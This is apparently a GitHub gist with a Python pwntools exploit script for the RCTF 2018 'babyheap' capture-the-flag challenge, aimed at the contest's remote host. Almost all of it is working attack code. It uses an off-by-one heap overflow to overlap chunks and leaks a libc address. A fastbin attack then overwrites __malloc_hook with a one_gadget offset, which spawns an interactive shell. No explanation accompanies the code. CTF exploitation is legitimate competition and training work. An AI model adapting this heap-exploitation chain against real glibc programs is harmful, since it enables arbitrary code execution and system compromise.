Skip to content

Instantly share code, notes, and snippets.

@hama7230
Last active May 22, 2018 06:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hama7230/86643fbf8ad4b6f31521e77a3339b4cf to your computer and use it in GitHub Desktop.
Save hama7230/86643fbf8ad4b6f31521e77a3339b4cf to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
# RCTF 2018 babyehap pwn
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('./libc.so.6')
elf = ELF('./babyheap')
context(os='linux', arch=elf.arch)
#context(log_level='debug') # output verbose log
RHOST = "babyheap.2018.teamrois.cn"
RPORT = 3154
LHOST = "127.0.0.1"
LPORT = 3154
def section_addr(name, elf=elf):
return elf.get_section_by_name(name).header['sh_addr']
def dbg(ss):
log.info("%s: 0x%x" % (ss, eval(ss)))
conn = None
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in 'rl':
conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
gdbscript = """
continue
""".format(hex(elf.symbols['main'] if 'main' in elf.symbols.keys() else elf.entrypoint))
conn = gdb.debug(['./babyheap'], gdbscript=gdbscript)
else:
conn = process(['./babyheap'])
# conn = process(['./babyheap'], env={'LD_PRELOAD': './libc.so.6'})
if opt == 'a': gdb.attach(conn)
# exploit
def alloc(size, content):
conn.sendlineafter('choice: ', '1')
conn.sendlineafter('size: ', str(size))
conn.sendafter('content: ', content)
conn.recvuntil('1. Alloc')
def show(idx):
conn.sendlineafter('choice: ', '2')
conn.sendlineafter('index: ', str(idx))
def delete(idx):
conn.sendlineafter('choice: ', '3')
conn.sendlineafter('index: ', str(idx))
conn.recvuntil('1. Alloc')
log.info('Pwning')
alloc(0x38, 'x'*0x20+'\n')
payload = 'y'* 0xf0 + p64(0x100) + '\xa0'
alloc(0x100, payload + '\n')
alloc(0x88, 'z'*0x20+'\n')
alloc(0x68, 'banpei\n')
delete(1)
delete(0)
alloc(0x38, 'x'*0x30+p64(0x40))
alloc(0x88, 'hoge\n')
alloc(0x60, 'fugafuga\n')
delete(1)
delete(2)
alloc(0x80, 'a'*0x70+'\n')
show(4)
conn.recvuntil('content: ')
libc_base = u64(conn.recv(6)+'\x00\x00') - 0x3c4b78
dbg('libc_base')
delete(1)
payload = 'z'*0x80
payload += p64(0) + p64(0x71) + 'hack'
alloc(0xf0, payload+'\n')
delete(4)
delete(1)
payload = 'z'*0x80
payload += p64(0) + p64(0x71) + p64(libc_base + 0x3c4aed)
alloc(0xf0, payload+'\n')
alloc(0x68, 'hoge\n')
payload = '\x00'*3 + p64(0)*2 + p64(libc_base + 0x4526a)
alloc(0x68, payload + '\n')
conn.sendline('1')
conn.sendline('1')
conn.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment